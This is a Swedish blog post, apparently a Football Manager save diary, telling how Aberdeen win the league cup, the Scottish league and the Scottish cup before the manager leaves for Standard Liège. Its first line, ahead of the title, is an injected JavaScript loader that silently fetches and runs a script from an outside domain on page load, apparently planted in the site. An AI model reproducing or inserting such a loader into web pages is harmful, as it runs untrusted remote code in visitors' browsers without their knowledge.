;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vad fan hände? – FMSweden
Meny Stäng

Vad fan hände?

Vad var det egentligen som hände? Det var ju inte så här det skulle bli. Efter att ha vunnit ligacupen och skaffat sig ett otroligt bra utgångsläge i ligan, hände det grejer under sista månaderna i Skottland.

Det började ju som sagt med att Devran NH Bagis vann ligacupfinalen med 2-0 mot Motherwell. Första titeln i turkens unga karriär, men det var bara början på en säsongsavslutning, som kommer leva vidare i Aberdeenfansens minne för alltid.

Med 4 omgångar kvar började t.om Bagis och sportchef Nilsson tro, att Aberdeen skulle vinna Skotska ligan. Samtidigt som de rödvita slog St. Mirren hemma med 3-1, vann också Celtic det mytomspunna Old Firm-derbyt mot ärkerivalen Rangers. Detta gjorde att Aberdeen nu hade 7 poäng ner till Rangers och de två skulle dessutom mötas i omgången efter. Vinst och Aberdeen skulle vara klara mästare.

Där kom dock säsongens bottennapp. Rangers skulle inte ge sig utan en ordentlig fight och körde över gästerna på Ibrox. 4 poäng kvar i ledningen och kvar att möta Hamilton(h), Celtic(b) och Hibernian(h) i säsongsavslutningen på Kingsford Stadium.

Aberdeen gjorde processen kort med Hamilton och vann med hela 6-1. Dagen efter sattes Aberdeen på paus under ett par timmar, när Rangers skulle spela hemma mot St.Mirren. Om Rangers förlorade skulle titeln vara deras. Rangers var såklart storfavoriter, men efter ett krampaktigt 1-1, så var nu skillanden inför de två sista omgångarna 6 poäng och +8 för Aberdeen. En poäng i de två avslutande matcherna skulle räcka för en första ligatitel för Aberdeen på 40 år.

Dagen var kommen, Aberdeen åkte till Glasgow och intog Celtic Park. Stämningen hängde i luften och de flera tusen tillresta supportrarna vädrade något som inte klubben eller staden känt på länge.

Efter första halvlek var det över. De tillresta supportrarna stod på läktaren och undrade vad fan hade vi just fått se. Resultattavlans blinkade sken gick inte att ta miste på:  CELTIC-ABERDEEN 1-4. 

Det var karnevalstämning på bortaläktaren. Efter ett mål ytterligare i andra halvlek skrevs slutresultatet till 1-5!!!

Aberdeen hade åkt till Glasgow, klätt av de regerande mästarna på deras egen hemmaplan och brutit en förbannelse som betydde att för första gången sen 1985, var laget från nordöstra Skottland mästare. 

Avslutningen inför hemmapubliken blev en ren formalitet, Hibernian besegrades med 3-1 och säsongen var över… nästan.

Det skulle ju faktiskt spelas en Skotsk cupfinal till. Mot Glasgow Rangers, på Hampden Park i Glasgow.

 

Luke McCormick kom upp genom Chelseas akademi, efter korta lån i Shrewsbury och Bristol Rovers, skrev han 2022 på för Aberdeen. Tanken var att få skjuts i karriären och utvecklas till den spelaren Chelsea en gång plockade in.

Det blev inte riktigt så för McCormick, han spelade 58 matcher för Aberdeen under tre säsonger, han gjorde inget större avttryck, inte förrän i hans allra sista spark, i hans allra sista match för klubben.

I den 120:e minuten på Hampden Park, trillade bollen ner framför fötterna på inhoppande Luke McCormick. Ställningen var 1-1 efter full tid och alla hade börjat göra sig redo för lotteriet som straffsparkar betyder. Inte Luke McCormick.

Han placerade in bollen intill högra stolpen och för en kort sekund, så var det inget ljud alls som hördes i hans huvud. Sen kom allt på en gång.

Aberdeen hade vunnit Skotska Ligacupen, man hade vunnit ligan och nu hade den förre Chelseatalangen gjort sitt livs mål hittills och givit Aberdeen den Skotska cuptiteln. I Glasgow mot Rangers.

Vad fan hände, det var ju inte så här det skulle bli? – Glasgow Times

Aberdeen har vunnit trippeln. Det var det som blev crescendot på de avslutande månaderna under 2024/25 och de var också det som blev avslutningen på Devran NH Bagis tid i Skottland.

Efter att ha landat i euforin några dagar efter den historiska trippeln hade bärgat, började det gå upp för både tränare och sportchef, att här har vi nått vägens ände. Vi måste vidare.

Efter att ha noga övervägt alternativen, skrev Devran NH Bagis på för Royal Standard de Liège. Fortsättning följer….

Ha en grym helg vänner.

SKÅL

Tobbe

Please wait...

Liknande Inlägg

4 kommentarer

Lämna ett svar